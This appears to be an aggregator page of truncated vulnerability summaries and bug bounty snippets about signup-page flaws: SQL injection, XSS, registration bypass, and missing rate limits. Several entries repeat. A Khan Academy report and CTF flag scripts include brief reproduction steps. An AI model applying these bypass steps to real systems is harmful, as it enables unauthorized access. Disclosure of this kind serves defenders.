CVE-2020-29159

An issue was discovered in Zammad before 3.5.1. The default signup Role for newly created Users can be a privileged Role, if configured by an admin. This behvaior was unintended...

h1-ctf: Grinch Networks compromised!

Grinch Networks compromised! For fast triage/validation and inspired by @manoelt in other CTF, I made a bash script to find and print all the 12 flags of this CTF. The script uses curl, wget, google-chrome headless for flag 2, unzip, grep and sed. If any of these commands is missing, the script...

CVE-2020-35676

BigProf Online Invoicing System before 3.1 fails to correctly sanitize an XSS payload when a user registers using the self-registration functionality. As such, an attacker can input a crafted payload that will execute upon the application's administrator browsing the registered users' list. Once...

h1-ctf: h1 hacky holidays CTF solution

Simple script to print all the flags. Full solution to follow want to spend more time writing this, but am racing to be first 10 submissions: echo "Flag 1 -- robots.txt" curl https://hackyholidays.h1ctf.com/robots.txt 2/dev/null | grep flag echo "" echo "Flag 2 -- js descrambed --...

BigProf Online Invoicing System 跨站脚本漏洞

BigProf Online Invoicing System OIS is an easy invoicing tool for small businesses, consultants and freelancers created using AppGini. A cross-site scripting vulnerability exists in app/membershipsignup.php and app/admin/pageViewMembers.php in BigProf Online Invoicing System versions prior to 3.1...

Khan Academy: Access to alerta.khanacademy.org leak sensitive data

Hi , I found to access https://alerta.khanacademy.org/ using signup bypass.That leak access to sensitive data of khanacademy.org Step To Reproduce: 1. Go to https://alerta.khanacademy.org//signup 2. Inspect Q and remove ng-hide F1121291 3. You got Signup Form. Signup account using...

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

Sql injection

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 is affected by CVE-2020-12870 due to an SQL injection on the username parameter in the signup page. The issue is documented across multiple sources (NVD, Red Hat entry, CVE lists) with CVSS scores indicating high/critical impact (CVSS v2 base 7.5; CVSS v3.1 base 9...

The Joys of Owning an ‘OG’ Email Account

When you own a short email address at a popular email provider, you are bound to get gobs of spam, and more than a few alerts about random people trying to seize control over the account. If your account name is short and desirable enough, this kind of activity can make the account less reliable...

Missing rate limit on signup page (NC-SA-2020-033)

A missing rate limit in the Preferred Providers app 1.7.0 allowed an attacker to set the password an uncontrolled amount of times...

CVE-2020-15511

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

CVE-2020-15511

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

Default configuration

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

CVE-2020-15511

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

Courier: Missing rate limit in signup Form

Hello Team , Description When signing up for an account, you enter your email. When this email is already in use, the server responds with "UserConfirmed":true,"UserSub":"ae294fff-6d55-407d-9676-1f3518029037" This in not a problem, but the fact that you could send this request unlimited times is...

CVE-2018-21252

An issue was discovered in Mattermost Server before 5.2, 5.1.1, 5.0.3, and 4.10.3. Attackers could use multiple e-mail addresses to bypass a domain-based policy for signups...

VulnCheck KEV: CVE-2020-36715

The Login/Signup Popup plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions in versions up to, and including, 1.4. This makes it possible for authenticated attackers to inject arbitrary web scripts into the plugin settings that execute...